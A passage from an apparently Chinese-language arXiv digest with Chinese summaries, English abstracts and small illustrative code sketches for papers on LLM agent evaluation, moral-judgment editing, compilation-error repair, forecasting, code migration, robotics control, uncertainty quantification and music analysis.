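    """critic 侧采样分布:均匀分布与 |TD|^alpha 优先分布按 anchor 线性混合。"""
    p = np.abs(td_errors) ** alpha
    prioritized = p / p.sum()
    uniform = np.full_like(prioritized, 1.0 / len(td_errors))
    return (1 - anchor) * uniform + anchor * prioritized

errs_flat = np.array([1.0, 1.0, 1.0, 1.0])     # 误差均匀:锚点为 0,纯均匀采样
errs_spiky = np.array([0.1, 0.1, 0.1, 4.0])    # 误差集中:锚点升高,偏向优先采样
a_flat = adaptive_anchor(errs_flat)
a_spiky = adaptive_anchor(errs_spiky)
probs = sample_probs(errs_spiky, a_spiky)
```

actor 侧则相反:从低误差转移中更新,以稳定策略优化,这正是"双流"解耦的含义。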
[AI-103] Beyond Completion: Probing Cumulative State Tracking to Predict LLM Agent Performance
【速读】:该论文旨在解决当前大语言模型(Large Language Model, LLM)代理能力评估中存在的重要盲区:即任务完成率(task-completion rate)作为标准指标无法有效区分模型在复杂推理过程中对中间状态(intermediate state)跟踪能力的差异。为解决此问题,作者提出了一种校准后的无草稿纸探测方法——工作记忆保真度-主动操作(Working Memory Fidelity-Active Manipulation, WMF-AM),其核心在于通过一个确定性的10任务代理电池来量化模型在累积算术状态追踪上的表现。关键创新在于引入K校准机制以维持探测器在具有判别力的范围内运行,从而克服传统固定深度基准测试在大规模模型上失去区分度的问题;实证结果显示,WMF-AM与代理性能呈显著正相关(Kendall’s tau = 0.612, p < 0.001),且该信号在控制任务完成率和模型规模后依然稳健,表明累积状态追踪能力是影响代理性能的关键因素。
链接: https://arxiv.org/abs/2603.27343
作者: Dengzhe Hou,Lingyu Jiang,Deng Li,Zirui Li,Fangzhou Lin,Kazunori D Yamada
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Task-completion rate is the standard proxy for LLM agent capability, but models with identical completion scores can differ substantially in their ability to track intermediate state. We introduce Working Memory Fidelity-Active Manipulation (WMF-AM), a calibrated no-scratchpad probe of cumulative arithmetic state tracking, and evaluate it on 20 open-weight models (0.5B-35B, 13 families) against a released deterministic 10-task agent battery. In a pre-specified, Bonferroni-corrected analysis, WMF-AM predicts agent performance with Kendall’s tau = 0.612 (p < 0.001, 95% CI [0.360, 0.814]); exploratory partial-tau analyses suggest this signal persists after controlling for completion score and model scale. Three construct-isolation ablations (K = 1 control, non-arithmetic ceiling, yoked cancellation) support the interpretation that cumulative state tracking under load, rather than single-step arithmetic or entity tracking alone, is the primary difficulty source. K-calibration keeps the probe in a discriminative range where prior fixed-depth benchmarks become non-discriminative; generalization beyond this open-weight sample remains open.
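"无草稿纸的累积算术状态追踪探测"可以用一个假设性生成器示意:给模型 K 步整数增量,要求直接报告累积和;K 校准即调节 K 使各模型落在可区分的成功率区间。题面格式与取值范围均为本文假设:

```python
import random

def make_probe(k, seed=0, lo=-9, hi=9):
    """WMF-AM 式累积状态追踪探测的简化示意:
    生成 k 步有符号整数增量,answer 为累积和;
    固定 seed 保证探测题目确定可复现(对应论文的 deterministic battery)。"""
    rng = random.Random(seed)
    deltas = [rng.randint(lo, hi) for _ in range(k)]
    prompt = "从 0 开始,依次累加: " + ", ".join(f"{d:+d}" for d in deltas)
    answer = sum(deltas)
    return prompt, answer

prompt, answer = make_probe(k=5, seed=42)
```

评测时只需比较模型的最终数值输出与 `answer`;增大 k 即提高"负载下"的状态追踪难度。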
[AI-104] CounterMoral: Editing Morals in Language Models
【速读】:该论文旨在解决当前语言模型在道德判断(moral judgments)编辑方面能力不足的问题,即如何有效调整模型对不同伦理框架下的道德决策输出,以更好地与人类价值观对齐。其解决方案的关键在于构建了一个名为CounterMoral的基准数据集,用于系统评估现有模型编辑技术在多维度道德情境下修改能力的有效性,从而推动面向伦理对齐的语言模型优化研究。
链接: https://arxiv.org/abs/2603.27338
作者: Michael Ripa,Jim Davies
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 7 pages (10 + 1 reference + 6 appendix). Honors thesis completed in June 2024, write-up completed in 2025
Abstract:Recent advancements in language model technology have significantly enhanced the ability to edit factual information. Yet, the modification of moral judgments, a crucial aspect of aligning models with human values, has garnered less attention. In this work, we introduce CounterMoral, a benchmark dataset crafted to assess how well current model editing techniques modify moral judgments across diverse ethical frameworks. We apply various editing techniques to multiple language models and evaluate their performance. Our findings contribute to the evaluation of language models designed to be ethical.
[AI-105] ComBench: A Repo-level Real-world Benchmark for Compilation Error Repair
【速读】:该论文旨在解决当前自动化编译错误修复(Automated Compilation Error Repair, ACER)技术在真实场景中性能评估不足的问题。现有基准测试存在诸多局限,如单一文件数据缺乏上下文、源代码多样性不足以及忽略仓库级复杂性等,导致模型表现难以反映实际开发环境中的挑战。为此,作者提出 ComBench——首个面向 C/C++ 语言的仓库级、可复现的真实世界编译错误修复基准。其关键创新在于:一是通过自动化框架从大型开源项目的 GitHub CI 历史中系统挖掘真实失败案例;二是设计高精度方法识别版本历史中的真实修复补丁(ground-truth repair patches),并构建高保真机制重现原始临时构建环境;三是所有样本均经过执行验证,确保故障可复现且修复补丁有效。ComBench 为评估现代大语言模型(LLM)在直接修复与代理式修复设置下的真实性能提供了可靠平台,并揭示了语法正确性与语义正确性之间的显著差距(例如 GPT-5 在语法修复上成功率达 73%,但语义有效性仅为 41%)。
链接: https://arxiv.org/abs/2603.27333
作者: Jia Li,Zeyang Zhuang,Zhuangbin Chen,Yuxin Su,Wei Meng,Michael R. Lyu
机构: 未知
类目: Software Engineering (cs.SE); Artificial Intelligence (cs.AI)
备注:
Abstract:Compilation errors pose pervasive and critical challenges in software development, significantly hindering productivity. Therefore, Automated Compilation Error Repair (ACER) techniques are proposed to mitigate these issues. Despite recent advancements in ACER, its real-world performance remains poorly evaluated. This can be largely attributed to the limitations of existing benchmarks, i.e., decontextualized single-file data, lack of authentic source diversity, and biased local task modeling that ignores crucial repository-level complexities. To bridge this critical gap, we propose ComBench, the first repository-level, reproducible real-world benchmark for C/C++ compilation error repair. ComBench is constructed through a novel, automated framework that systematically mines real-world failures from the GitHub CI histories of large-scale open-source projects. Our framework contributes techniques for the high-precision identification of ground-truth repair patches from complex version histories and a high-fidelity mechanism for reproducing the original, ephemeral build environments. To ensure data quality, all samples in ComBench are execution-verified – guaranteeing reproducible failures and build success with ground-truth patches. Using ComBench, we conduct a comprehensive evaluation of 12 modern LLMs under both direct and agent-based repair settings. Our experiments reveal a significant gap between a model’s ability to achieve syntactic correctness (a 73% success rate for GPT-5) and its ability to ensure semantic correctness (only 41% of its patches are valid). We also find that different models exhibit distinct specializations for different error types. ComBench provides a robust and realistic platform to guide the future development of ACER techniques capable of addressing the complexities of modern software development.
[AI-106] Multimodal Forecasting for Commodity Prices Using Spectrogram-Based and Time Series Representations AAAI2026
【速读】:该论文旨在解决多变量时间序列预测中因复杂变量间依赖关系和异质外部影响因素导致的建模难题。其解决方案的关键在于提出了一种基于谱图增强的多模态融合框架(Spectrogram-Enhanced Multimodal Fusion, SEMF):首先将目标时间序列转换为Morlet小波谱图(Morlet wavelet spectrogram),利用Vision Transformer编码器提取局部化、频率感知特征;同时,通过Transformer对宏观经济等外生变量进行时序建模,捕捉多变量动态变化;最后,引入双向交叉注意力模块融合两种模态信息,在保留各自信号特性的同时建模跨模态相关性,从而实现更精准、鲁棒的多尺度模式识别与预测。
链接: https://arxiv.org/abs/2603.27321
作者: Soyeon Park,Doohee Chung,Charmgil Hong
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: AAAI 2026 Summer Symposium Series; 9 pages
Abstract:Forecasting multivariate time series remains challenging due to complex cross-variable dependencies and the presence of heterogeneous external influences. This paper presents Spectrogram-Enhanced Multimodal Fusion (SEMF), which combines spectral and temporal representations for more accurate and robust forecasting. The target time series is transformed into Morlet wavelet spectrograms, from which a Vision Transformer encoder extracts localized, frequency-aware features. In parallel, exogenous variables, such as financial indicators and macroeconomic signals, are encoded via a Transformer to capture temporal dependencies and multivariate dynamics. A bidirectional cross-attention module integrates these modalities into a unified representation that preserves distinct signal characteristics while modeling cross-modal correlations. Applied to multiple commodity price forecasting tasks, SEMF achieves consistent improvements over seven competitive baselines across multiple forecasting horizons and evaluation metrics. These results demonstrate the effectiveness of multimodal fusion and spectrogram-based encoding in capturing multi-scale patterns within complex financial time series.
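将一维序列转为 Morlet 小波谱图(即 [尺度 × 时间] 的二维表征,供 ViT 编码)的最小化 numpy 实现可示意如下。归一化与尺度选取是本文假设的简化,非论文原始配置:

```python
import numpy as np

def morlet_scalogram(signal, scales, w0=6.0):
    """Morlet 小波谱图的极简示意:
    对每个尺度 s 构造复 Morlet 小波,与信号卷积后取模,
    得到 [len(scales) x len(signal)] 的时频表征。"""
    n = len(signal)
    out = np.empty((len(scales), n))
    for i, s in enumerate(scales):
        t = np.arange(-4 * s, 4 * s + 1)
        wavelet = np.exp(1j * w0 * t / s) * np.exp(-0.5 * (t / s) ** 2)
        wavelet /= np.sqrt(s)
        out[i] = np.abs(np.convolve(signal, wavelet, mode="same"))
    return out

t = np.linspace(0, 1, 256)
x = np.sin(2 * np.pi * 8 * t)                  # 8 Hz 正弦的玩具"价格"序列
spec = morlet_scalogram(x, scales=[2, 4, 8, 16])
```

能量应集中在与信号周期最匹配的尺度行上;SEMF 再将此二维表征切块送入 ViT 提取局部化的频率感知特征。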
[AI-107] A Multi-agent AI System for Deep Learning Model Migration from TensorFlow to JAX
【速读】:该论文旨在解决大规模深度学习模型从TensorFlow框架向JAX框架迁移过程中,因代码复杂性和人工维护成本高而导致的效率低下问题。解决方案的关键在于构建一个基于AI的多智能体系统,其中包含一个结合静态分析与AI指令的规划器(AI planner),通过生成式示例驱动的剧本(example-based playbooks)协调编译器(coders)和调度器(orchestrator)执行可靠迁移;同时引入基于AI的质量评估机制(AI-based judges)以在缺乏测试用例的情况下确保代码符合严格的风格与依赖要求,从而实现6.4–8倍的速度提升,并形成AI自我优化的良性循环。
链接: https://arxiv.org/abs/2603.27296
作者: Stoyan Nikolov,Bernhard Konrad,Moritz Gronbach,Niket Kumar,Ann Yan,Varun Singh,Yaning Liang,Parthasarathy Ranganathan
机构: 未知
类目: Software Engineering (cs.SE); Artificial Intelligence (cs.AI)
备注:
Abstract:The rapid development of AI-based products and their underlying models has led to constant innovation in deep learning frameworks. Google has been pioneering machine learning usage across dozens of products. Maintaining the multitude of model source codes in different ML frameworks and versions is a significant challenge. So far the maintenance and migration work was done largely manually by human experts. We describe an AI-based multi-agent system that we built to support automatic migration of TensorFlow-based deep learning models into JAX-based ones. We make three main contributions: First, we show how an AI planner that uses a mix of static analysis with AI instructions can create migration plans for very complex code components that are reliably followed by the combination of an orchestrator and coders, using AI-generated example-based playbooks. Second, we define quality metrics and AI-based judges that accelerate development when the code to evaluate has no tests and has to adhere to strict style and dependency requirements. Third, we demonstrate how the system accelerates code migrations in a large hyperscaler environment on commercial real-world use-cases. Our approach dramatically reduces the time (6.4x-8x speedup) for deep learning model migrations and creates a virtuous circle where effectively AI supports its own development workflow. We expect that the techniques and approaches described here can be generalized for other framework migrations and general code transformation tasks.
[AI-108] Codebase-Memory: Tree-Sitter-Based Knowledge Graphs for LLM Code Exploration via MCP
【速读】:该论文旨在解决大型语言模型(Large Language Model, LLM)在代码库中进行代码探索时效率低下、缺乏结构理解的问题,传统方法依赖重复的文件读取和grep搜索,导致每查询消耗数千token且无法有效建模代码间的语义关系。其解决方案的关键在于提出Codebase-Memory系统,该系统基于Tree-Sitter构建持久化的知识图谱,通过模型上下文协议(Model Context Protocol, MCP)实现多阶段解析流程,包括并行工作池、调用图遍历、影响分析与社区发现,从而以极低的token消耗(仅为原方法的十分之一)和工具调用次数(减少2.1倍)显著提升代码理解的结构性与效率,在31个真实项目中达到83%的答案质量,并在图原生查询(如枢纽节点检测与调用者排序)中表现优于或等同于文件探索型代理。
链接: https://arxiv.org/abs/2603.27277
作者: Martin Vogel,Falk Meyer-Eschenbach,Severin Kohler,Elias Grünewald,Felix Balzer
机构: 未知
类目: Software Engineering (cs.SE); Artificial Intelligence (cs.AI); Programming Languages (cs.PL)
备注: 10 pages, 5 authors, preprint
Abstract:Large Language Model (LLM) coding agents typically explore codebases through repeated file-reading and grep-searching, consuming thousands of tokens per query without structural understanding. We present Codebase-Memory, an open-source system that constructs a persistent, Tree-Sitter-based knowledge graph via the Model Context Protocol (MCP), parsing 66 languages through a multi-phase pipeline with parallel worker pools, call-graph traversal, impact analysis, and community discovery. Evaluated across 31 real-world repositories, Codebase-Memory achieves 83% answer quality versus 92% for a file-exploration agent, at ten times fewer tokens and 2.1 times fewer tool calls. For graph-native queries such as hub detection and caller ranking, it matches or exceeds the explorer on 19 of 31 languages.
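上文摘要提到的"图原生查询"(如枢纽节点检测与调用者排序)可以用一个极简的调用图示例说明其思路。以下为假设性的示意代码(按出入度之和对节点打分排序),并非该系统的真实实现:

```python
from collections import defaultdict

def build_call_graph(edges):
    """由 (caller, callee) 边列表构建邻接表:caller -> 被调用函数集合。"""
    graph = defaultdict(set)
    for caller, callee in edges:
        graph[caller].add(callee)
    return graph

def rank_hubs(graph, top_k=3):
    """按总度数(入度 + 出度)为节点打分,返回得分最高的 top_k 个"枢纽"。"""
    fan_in = defaultdict(int)
    for caller, callees in graph.items():
        for callee in callees:
            fan_in[callee] += 1
    nodes = set(graph) | set(fan_in)
    score = {n: len(graph.get(n, ())) + fan_in[n] for n in nodes}
    # 得分相同按名称排序,保证结果确定
    return sorted(nodes, key=lambda n: (-score[n], n))[:top_k]
```

被大量调用的工具函数会自然浮到排名顶端;真实系统还会叠加影响分析与社区发现,此处仅展示"图查询无需逐文件读取"这一核心思想。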
[AI-109] Robust Global-Local Behavior Arbitration via Continuous Command Fusion Under LiDAR Errors
【速读】:该论文旨在解决模块化自动驾驶系统在感知不完善和严格实时约束下,如何协调全局路径跟踪目标与局部安全反应的问题。其关键解决方案是提出一个基于ROS2原生的仲裁模块,该模块持续融合两个不变且可解释的控制器输出:基于Pure Pursuit的全局参考轨迹跟踪控制器和基于LiDAR的反应式Gap Follow控制器;在每个控制周期中,两控制器分别生成Ackermann指令,由一个通过PPO训练的策略网络根据紧凑特征观测预测连续门控值,从而生成单一融合驱动命令,并辅以实用的安全检查机制,实现对不同感知质量下的鲁棒性控制决策。
链接: https://arxiv.org/abs/2603.27273
作者: Mohamed Elgouhary,Amr S. El-Wakeel
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI); Systems and Control (eess.SY)
备注:
Abstract:Modular autonomous driving systems must coordinate global progress objectives with local safety-driven reactions under imperfect sensing and strict real-time constraints. This paper presents a ROS2-native arbitration module that continuously fuses the outputs of two unchanged and interpretable controllers: a global reference-tracking controller based on Pure Pursuit and a reactive LiDAR-based Gap Follow controller. At each control step, both controllers propose Ackermann commands, and a PPO-trained policy predicts a continuous gate from a compact feature observation to produce a single fused drive command, augmented with practical safety checks. For comparison under identical ROS topic inputs and control rate, we implement a lightweight sampling-based predictive baseline. Robustness is evaluated using a ROS2 impairment protocol that injects LiDAR noise, delay, and dropout, and additionally sweeps forward-cone false short-range outliers. In a repeatable close-proximity passing scenario, we report safe success and failure rates together with per-step end-to-end controller runtime as sensing stress increases. The study is intended as a command-level robustness evaluation in a modular ROS2 setting, not as a replacement for planning-level interaction reasoning.
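摘要中"策略网络预测连续门控值、融合两路Ackermann指令并叠加安全检查"的仲裁逻辑,可以用如下示意代码表达(min_gap 安全阈值与安全覆盖规则为本文作者的假设,并非论文给出的具体取值):

```python
def fuse_commands(global_cmd, reactive_cmd, gate, min_gap=0.3, nearest_obstacle=1.0):
    """融合两条 (转向, 速度) 指令。

    gate=1.0 完全跟随全局 Pure Pursuit 指令,gate=0.0 完全跟随反应式
    Gap Follow 指令。当最近障碍物距离小于 min_gap(假设阈值)时,
    安全检查强制切换到反应式指令。
    """
    gate = max(0.0, min(1.0, gate))
    if nearest_obstacle < min_gap:  # 安全覆盖:近距离时信任反应式控制器
        gate = 0.0
    steer = gate * global_cmd[0] + (1.0 - gate) * reactive_cmd[0]
    speed = gate * global_cmd[1] + (1.0 - gate) * reactive_cmd[1]
    return steer, speed
```

连续门控(而非硬切换)使输出指令随传感状态平滑过渡,这正是该仲裁模块区别于离散行为切换的关键。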
[AI-110] Quantification of Credal Uncertainty: A Distance-Based Approach
【速读】:该论文旨在解决如何在多分类场景中对可信集(credal sets)中的总不确定性(total uncertainty)、随机不确定性(aleatoric uncertainty)和认知不确定性(epistemic uncertainty)进行量化的问题,这一问题在现有研究中尚未得到充分探讨。解决方案的关键在于提出一种基于距离的度量框架,利用积分概率度量(Integral Probability Metrics, IPMs)定义一组具有明确语义解释的不确定性测度,该框架满足自然的理论性质且对常见IPM选择保持计算可 tractable(可计算性)。作者以总变差距离(total variation distance)为例进行实例化,在二分类情况下恢复了已有的不确定性度量,并首次实现了其向多分类场景的合理推广,实验表明该方法在低计算成本下表现出良好的实用性。
链接: https://arxiv.org/abs/2603.27270
作者: Xabier Gonzalez-Garcia,Siu Lun Chau,Julian Rodemann,Michele Caprio,Krikamol Muandet,Humberto Bustince,Sébastien Destercke,Eyke Hüllermeier,Yusuf Sale
机构: 未知
类目: Artificial Intelligence (cs.AI); Machine Learning (stat.ML)
备注:
Abstract:Credal sets, i.e., closed convex sets of probability measures, provide a natural framework to represent aleatoric and epistemic uncertainty in machine learning. Yet how to quantify these two types of uncertainty for a given credal set, particularly in multiclass classification, remains underexplored. In this paper, we propose a distance-based approach to quantify total, aleatoric, and epistemic uncertainty for credal sets. Concretely, we introduce a family of such measures within the framework of Integral Probability Metrics (IPMs). The resulting quantities admit clear semantic interpretations, satisfy natural theoretical desiderata, and remain computationally tractable for common choices of IPMs. We instantiate the framework with the total variation distance and obtain simple, efficient uncertainty measures for multiclass classification. In the binary case, this choice recovers established uncertainty measures, for which a principled multiclass generalization has so far been missing. Empirical results confirm practical usefulness, with favorable performance at low computational cost.
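以论文实例化所用的总变差距离为例,对于由有限个极点生成的可信集,可以用极点间的最大TV距离(直径)来示意"认知不确定性"这类基于距离的度量。以下仅为依据摘要写的示意草图,未必与论文中各不确定性度量的具体定义一致:

```python
def total_variation(p, q):
    """两个离散分布之间的总变差距离:0.5 * L1 距离。"""
    return 0.5 * sum(abs(pi - qi) for pi, qi in zip(p, q))

def tv_diameter(credal_set):
    """示意性的"认知不确定性":有限生成可信集各极点间的最大两两TV距离。
    可信集退化为单个分布时,直径为 0(无认知不确定性)。"""
    if len(credal_set) < 2:
        return 0.0
    return max(
        total_variation(p, q)
        for i, p in enumerate(credal_set)
        for q in credal_set[i + 1:]
    )
```

可信集越"大"(成员分布彼此越远),该量越大;这与摘要中"认知不确定性刻画可信集的弥散程度"的直觉一致。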
[AI-111] Amalgam: Hybrid LLM -PGM Synthesis Algorithm for Accuracy and Realism
【速读】:该论文旨在解决生成式人工智能(Generative AI)在合成数据生成中面临的两难问题:传统概率图模型(Probabilistic Graphical Models, PGMs)虽能支持高级分析但难以处理复杂模式,而大型语言模型(Large Language Models, LLMs)虽可建模复杂结构却导致数据分布偏斜,削弱了其用于高级分析的有效性。解决方案的关键在于提出一种混合算法 Amalgam,融合 LLM 的结构表达能力与 PGM 的统计保真特性,从而在保持数据真实度(realism)的同时确保统计合理性与隐私保障,实验表明其平均 χ² p 值达 91%,真实度评分 3.8/5,显著优于现有方法(3.3/5)。
链接: https://arxiv.org/abs/2603.27254
作者: Antheas Kapenekakis,Bent Thomsen,Katja Hose,Michele Albano
机构: 未知
类目: Databases (cs.DB); Artificial Intelligence (cs.AI)
备注:
Abstract:To generate synthetic datasets, e.g., in domains such as healthcare, the literature proposes approaches of two main types: Probabilistic Graphical Models (PGMs) and Deep Learning models, such as LLMs. While PGMs produce synthetic data that can be used for advanced analytics, they do not support complex schemas and datasets. LLMs, on the other hand, support complex schemas but produce skewed dataset distributions, which are less useful for advanced analytics. In this paper, we therefore present Amalgam, a hybrid LLM-PGM data synthesis algorithm supporting both advanced analytics, realism, and tangible privacy properties. We show that Amalgam synthesizes data with an average 91% \chi^2 p-value and scores 3.8/5 for realism using our proposed metric, where state-of-the-art is 3.3 and real data is 4.7.
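摘要中用 \chi^2 p 值衡量合成数据与真实分布的统计保真度,其统计量部分可以如下示意(p 值还需查 \chi^2 分布,可用 scipy 完成;真实数据比例与合成计数均为虚构示例):

```python
def chi_square_statistic(observed_counts, expected_probs):
    """Pearson 卡方统计量:合成数据各类别计数 vs 按真实数据比例的期望计数。
    统计量越小,合成分布与真实分布越接近(对应的 p 值越大)。"""
    n = sum(observed_counts)
    stat = 0.0
    for obs, p in zip(observed_counts, expected_probs):
        expected = n * p
        stat += (obs - expected) ** 2 / expected
    return stat
```

统计量为 0 表示合成计数与期望完全一致;Amalgam 报告的"平均 91% p 值"即意味着各列上的卡方统计量普遍很小。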
[AI-112] Can pre-trained Deep Learning models predict groove ratings?
【速读】:该论文旨在解决如何利用深度学习模型从音频信号中直接预测“律动”(groove)及其相关感知维度的问题,特别是相较于传统手工设计的声学特征,能否更有效地捕捉到风格依赖的复杂律动特性。其解决方案的关键在于使用七种先进的深度学习模型提取音频嵌入(audio embeddings),并对比这些表示与传统特征在预测律动感评分和相关感知响应上的表现;进一步通过源分离技术分析各乐器成分对律动预测的独立贡献,从而揭示不同音乐风格(放克、流行和摇滚)下律动特性的差异化编码机制。研究结果表明,深度音频表示能够有效建模风格相关的律动成分,显著优于传统特征,凸显了表征学习在音乐信息检索(Music Information Retrieval, MIR)中的强大潜力。
链接: https://arxiv.org/abs/2603.27237
作者: Axel Marmoret,Nicolas Farrugia,Jan Alexander Stupacher
机构: 未知
类目: Sound (cs.SD); Artificial Intelligence (cs.AI); Machine Learning (cs.LG); Audio and Speech Processing (eess.AS)
备注: Submitted to the SMC 2026 conference. 3 figures and 2 tables
Abstract:This study explores the extent to which deep learning models can predict groove and its related perceptual dimensions directly from audio signals. We critically examine the effectiveness of seven state-of-the-art deep learning models in predicting groove ratings and responses to groove-related queries through the extraction of audio embeddings. Additionally, we compare these predictions with traditional handcrafted audio features. To better understand the underlying mechanics, we extend this methodology to analyze predictions based on source-separated instruments, thereby isolating the contributions of individual musical elements. Our analysis reveals a clear separation of groove characteristics driven by the underlying musical style of the tracks (funk, pop, and rock). These findings indicate that deep audio representations can successfully encode complex, style-dependent groove components that traditional features often miss. Ultimately, this work highlights the capacity of advanced deep learning models to capture the multifaceted concept of groove, demonstrating the strong potential of representation learning to advance predictive Music Information Retrieval methodologies.
[AI-113] Unsupervised Evaluation of Deep Audio Embeddings for Music Structure Analysis
【速读】:该论文旨在解决音乐结构分析(Music Structure Analysis, MSA)中依赖大量标注数据的瓶颈问题,以及现有方法在处理结构性歧义时的局限性。其关键解决方案是采用无监督评估框架,对九种开源通用预训练深度音频模型进行测试,通过提取节拍级嵌入(barwise embeddings)并结合三种无监督分割算法(Foote’s checkerboard kernels、谱聚类和相关块匹配法 Correlation Block-Matching, CBM),仅聚焦于边界检测任务。结果表明,现代通用深度嵌入优于传统基于频谱图的基线方法,且CBM算法在下游分割任务中表现最稳定有效,同时提出“裁剪”(trimming)甚至“双重裁剪”(double trimming)以提升评估标准的严谨性。
链接: https://arxiv.org/abs/2603.27218
作者: Axel Marmoret
机构: 未知
类目: Sound (cs.SD); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: Submitted to the SMC 2026 conference. 2 figures and 2 tables in the main document, 7 figures in Appendix
Abstract:Music Structure Analysis (MSA) aims to uncover the high-level organization of musical pieces. State-of-the-art methods are often based on supervised deep learning, but these methods are bottlenecked by the need for heavily annotated data and inherent structural ambiguities. In this paper, we propose an unsupervised evaluation of nine open-source, generic pre-trained deep audio models on MSA. For each model, we extract barwise embeddings and segment them using three unsupervised segmentation algorithms (Foote's checkerboard kernels, spectral clustering, and Correlation Block-Matching (CBM)), focusing exclusively on boundary retrieval. Our results demonstrate that modern, generic deep embeddings generally outperform traditional spectrogram-based baselines, but not systematically. Furthermore, our unsupervised boundary estimation methodology generally yields stronger performance than recent linear probing baselines. Among the evaluated techniques, the CBM algorithm consistently emerges as the most effective downstream segmentation method. Finally, we highlight the artificial inflation of standard evaluation metrics and advocate for the systematic adoption of "trimming", or even "double trimming", annotations to establish more rigorous MSA evaluation standards.
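摘要提倡的"裁剪"评估(去掉标注中首尾两个平凡边界,即乐曲起止点,再计分)可以用一个简化的边界命中率函数示意。容差窗口与示例数据均为假设,真实评测通常使用 mir_eval 等库:

```python
def hit_rate(estimated, reference, window=0.5, trim=False):
    """参考边界被估计边界命中(误差在 ±window 秒内)的比例。

    trim=True 时先去掉首尾两个参考边界:乐曲的起点和终点任何方法
    都能"检出",保留它们会人为抬高指标。
    """
    ref = sorted(reference)
    if trim:
        ref = ref[1:-1]
    if not ref:
        return 0.0
    hits = sum(1 for r in ref if any(abs(r - e) <= window for e in estimated))
    return hits / len(ref)
```

同一组估计边界在裁剪前后得分可以相差很大,这正是摘要所说"标准指标被人为抬高"的来源。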
[AI-114] AutoMS: Multi-Agent Evolutionary Search for Cross-Physics Inverse Microstructure Design
【速读】:该论文旨在解决材料科学中微结构逆向设计的难题,即如何在复杂的多物理场耦合目标下高效搜索满足物理约束的可行解。传统拓扑优化方法因计算成本过高而难以应用,而深度生成模型常出现“物理幻觉”(physical hallucinations),无法保证结果的物理有效性。其解决方案的关键在于提出一种多智能体神经符号框架AutoMS,通过大语言模型(LLM)作为“语义导航器”初始化搜索空间并跳出局部最优,并结合创新的仿真感知进化搜索(Simulation-Aware Evolutionary Search, SAES)机制,利用仿真反馈进行局部梯度近似和定向参数更新,从而引导搜索过程逼近物理有效的帕累托前沿。该架构由管理、解析、生成与仿真四个专用智能体协同工作,在17个跨物理任务上实现83.8%的成功率,显著优于NSGA-II(43.7%)和基于ReAct的LLM基线(53.3%)。
链接: https://arxiv.org/abs/2603.27195
作者: Zhenyuan Zhao,Yu Xing,Tianyang Xue,Lingxin Cao,Xin Yan,Lin Lu
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Designing microstructures that satisfy coupled cross-physics objectives is a fundamental challenge in material science. This inverse design problem involves a vast, discontinuous search space where traditional topology optimization is computationally prohibitive, and deep generative models often suffer from “physical hallucinations,” lacking the capability to ensure rigorous validity. To address this limitation, we introduce AutoMS, a multi-agent neuro-symbolic framework that reformulates inverse design as an LLM-driven evolutionary search. Unlike methods that treat LLMs merely as interfaces, AutoMS integrates them as “semantic navigators” to initialize search spaces and break local optima, while our novel Simulation-Aware Evolutionary Search (SAES) addresses the “blindness” of traditional evolutionary strategies. Specifically, SAES utilizes simulation feedback to perform local gradient approximation and directed parameter updates, effectively guiding the search toward physically valid Pareto frontiers. Orchestrating specialized agents (Manager, Parser, Generator, and Simulator), AutoMS achieves a state-of-the-art 83.8% success rate on 17 diverse cross-physics tasks, nearly doubling the performance of traditional NSGA-II (43.7%) and significantly outperforming ReAct-based LLM baselines (53.3%). Furthermore, our hierarchical architecture reduces total execution time by 23.3%. AutoMS demonstrates that autonomous agent systems can effectively navigate complex physical landscapes, bridging the gap between semantic design intent and rigorous physical validity.
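SAES 中"利用仿真反馈做局部梯度近似与定向参数更新"的核心思想,可以用中心差分近似梯度的一步上升来示意。步长、扰动量均为假设取值,simulate 代表任意可调用的仿真评分函数(分数越高越好):

```python
def saes_step(params, simulate, step=0.1, eps=1e-3):
    """一步仿真感知更新:对每个参数做 ±eps 扰动并调用仿真,
    以中心差分近似局部梯度,再沿提升仿真得分的方向移动参数。"""
    grad = []
    for i in range(len(params)):
        hi = list(params); hi[i] += eps
        lo = list(params); lo[i] -= eps
        grad.append((simulate(hi) - simulate(lo)) / (2 * eps))
    return [p + step * g for p, g in zip(params, grad)]
```

与"盲目"的进化变异相比,这种由仿真反馈给出方向的更新正是摘要中 SAES 区别于传统进化策略之处;每步需要 2×维度 次仿真调用,是其代价。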
[AI-115] Multi-AUV Ad-hoc Networks-Based Multi-Target Tracking Based on Scene-Adaptive Embodied Intelligence
【速读】:该论文旨在解决多自主水下航行器(AUV)自组织网络在高度动态拓扑变化和严重受限声学通信带宽条件下,传统以数据为中心的架构难以维持操作一致性的问题。解决方案的关键在于提出一种场景自适应具身智能(Scene-Adaptive Embodied Intelligence, EI)架构,将AUV重构为集成感知、决策与物理执行的统一认知闭环,并设计基于信标(beacon-based)的通信与控制模型,将通信链路视为约束感知的动态通道,从而有效衔接高层策略推理与分布式物理执行;同时引入具有双路径评论家机制的场景自适应多智能体强化学习(Scene-Adaptive Multi-Agent Reinforcement Learning, SA-MARL)算法,通过权重驱动的动态融合过程整合场景评论家网络与通用评论家网络,实现特定追踪任务与全局安全约束的有效解耦,促进策略的自主演化。
链接: https://arxiv.org/abs/2603.27194
作者: Kai Tian,Jialun Wang,Chuan Lin,Guangjie Han,Shengchao Zhu,Ying Liu,Qian Zhu
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注:
Abstract:With the rapid advancement of underwater networking and multi-agent coordination technologies, autonomous underwater vehicle (AUV) ad-hoc networks have emerged as a pivotal framework for executing complex maritime missions, such as multi-target tracking. However, traditional data-centric architectures struggle to maintain operational consistency under highly dynamic topological fluctuations and severely constrained acoustic communication bandwidth. This article proposes a scene-adaptive embodied intelligence (EI) architecture for multi-AUV ad-hoc networks, which re-envisions AUVs as embodied entities by integrating perception, decision-making, and physical execution into a unified cognitive loop. To materialize the functional interaction between these layers, we define a beacon-based communication and control model that treats the communication link as a dynamic constraint-aware channel, effectively bridging the gap between high-level policy inference and decentralized physical actuation. Specifically, the proposed architecture employs a three-layer functional framework and introduces a Scene-Adaptive MARL (SA-MARL) algorithm featuring a dual-path critic mechanism. By integrating a scene critic network and a general critic network through a weight-based dynamic fusion process, SA-MARL effectively decouples specialized tracking tasks from global safety constraints, facilitating autonomous policy evolution. Evaluation results demonstrate that the proposed scheme significantly accelerates policy convergence and achieves superior tracking 